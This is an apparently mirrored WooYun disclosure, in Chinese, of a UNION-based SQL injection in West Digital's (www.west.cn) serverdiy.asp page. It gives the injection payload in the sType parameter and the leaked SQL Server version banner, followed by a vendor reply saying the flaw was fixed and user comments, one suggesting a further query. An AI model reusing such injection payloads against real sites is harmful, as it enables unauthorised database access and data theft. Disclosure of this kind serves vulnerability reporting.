域名商安全之西部数码主站SQL注入(可UNION)

admin

102620
文章

87
评论

2017年4月23日13:55:14评论399 views字数 229阅读0分45秒阅读模式

摘要

2016-04-21：细节已通知厂商并且等待厂商处理中
2016-04-22：厂商已经确认，细节仅向厂商公开
2016-04-22：厂商已经修复漏洞并主动公开，细节向公众公开

漏洞概要关注数(22) 关注此漏洞

缺陷编号： WooYun-2016-198993

漏洞标题：域名商安全之西部数码主站SQL注入(可UNION)

漏洞作者：路人甲

提交时间： 2016-04-21 18:59

修复时间： 2016-04-22 11:10

公开时间： 2016-04-22 11:10

漏洞类型： SQL注射漏洞

危害等级：高

自评Rank： 18

漏洞状态：厂商已经修复

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签：注入

3人收藏

漏洞详情

披露状态：

2016-04-21：细节已通知厂商并且等待厂商处理中
2016-04-22：厂商已经确认，细节仅向厂商公开
2016-04-22：厂商已经修复漏洞并主动公开，细节向公众公开

简要描述：

大表哥的表哥帮忙绕了一下

详细说明：

code 区域

www.west.cn/services/server/serverdiy.asp
 
 data:  act=diymsg&sType=22%27and%201=1%27union%20select%20Null,Null,Null,@@Version,Null,Null;--&ppid=0

code 区域

Microsoft SQL Server 2012 - 11.0.2100.60 (X64) Feb 10 2012 19:39:15 Copyright (c) Microsoft Corporation Enterprise Edition: Core-based Licensing (64-bit) on Windows NT 6.2 (Build 9200: ) (Hypervisor)

漏洞证明：

过滤了一些东西，比如或db_name....

修复方案：

吊打程序员

过滤转义上waf

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：8

确认时间：2016-04-22 09:48

厂商回复：

非常感谢，已经通知程序员立即修复。。

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

2016-04-22 09:51 | HackBraid ( 核心白帽子 | Rank:1914 漏洞数:304 | 最近有人冒充该账号行骗，任何自称HackBrai...)

0

。。。

1# 回复此人
2016-04-22 11:21 | sysALong ( 普通白帽子 | Rank:464 漏洞数:100 | 在我们黑龙江这噶哒，就没有什么事是【撸串...)

0

我发现西部数码有一个地方可以越权。。。。挺长时间事了。。。现在。。。忘了地址了。

2# 回复此人
2016-04-22 13:15 | HackBraid ( 核心白帽子 | Rank:1914 漏洞数:304 | 最近有人冒充该账号行骗，任何自称HackBrai...)

0

select current_user

3# 回复此人
2016-04-22 15:25 | 宇文硕 ( 路人 | Rank:0 漏洞数:1 | 回收废旧彩电,冰箱,洗衣机,电风扇,电脑,电...)

0

为毛只有8个rank

4# 回复此人
2016-04-22 17:22 | 伤剑 ( 普通白帽子 | Rank:230 漏洞数:86 | 此号不是本人了！)

0

..666

5# 回复此人
2016-04-22 21:45 | 一级残废 ( 路人 | Rank:8 漏洞数:2 | 残废)

1

程序猿招你惹你了，你一句话，就要被打，你不理解程序猿的痛苦，高烧60多度，还在修bug 容易么

6# 回复此人
2016-04-23 04:47 | Bloodwolf ( 实习白帽子 | Rank:47 漏洞数:8 | whoami)

0

早起的虫儿有鸟吃

7# 回复此人
2016-04-23 14:02 | 伤剑 ( 普通白帽子 | Rank:230 漏洞数:86 | 此号不是本人了！)

0

0000000000000000000000000000000000000000000000000

8# 回复此人
2016-04-23 23:46 | GHRXK ( 实习白帽子 | Rank:58 漏洞数:21 | 渗透，接单，爆破，社工，脱裤，洗钱，挂黑...)

0

为毛只有8个rank

9# 回复此人
2016-04-24 09:09 | 伤剑 ( 普通白帽子 | Rank:230 漏洞数:86 | 此号不是本人了！)

0

6666666666666666

10# 回复此人
2016-05-24 17:41 | 尼古拉斯复愁 ( 路人 | Rank:6 漏洞数:3 )

0

@一级残废顶一个。

11# 回复此人
2016-05-27 15:32 | 一级残废 ( 路人 | Rank:8 漏洞数:2 | 残废)

0

@尼古拉斯复愁想知道，你怎么没有漏洞还有账号，而里面还有2个rank呢，匿名提交的不显示？

12# 回复此人
2016-05-28 15:59 | 尼古拉斯复愁 ( 路人 | Rank:6 漏洞数:3 )

0

@一级残废告诉你吧，开后门就阔以了。

13# 回复此人
2016-05-28 16:07 | 伤剑 ( 普通白帽子 | Rank:230 漏洞数:86 | 此号不是本人了！)

0

尼古拉斯复愁宝宝又看到你了

14# 回复此人
2016-05-28 16:14 | 尼古拉斯复愁 ( 路人 | Rank:6 漏洞数:3 )

0

你是哪个宝宝？我认识的宝宝太多了、

15# 回复此人

漏洞概要 关注数(22) 关注此漏洞

缺陷编号： WooYun-2016-198993

漏洞标题： 域名商安全之西部数码主站SQL注入(可UNION)

相关厂商： 西部数码

漏洞作者： 路人甲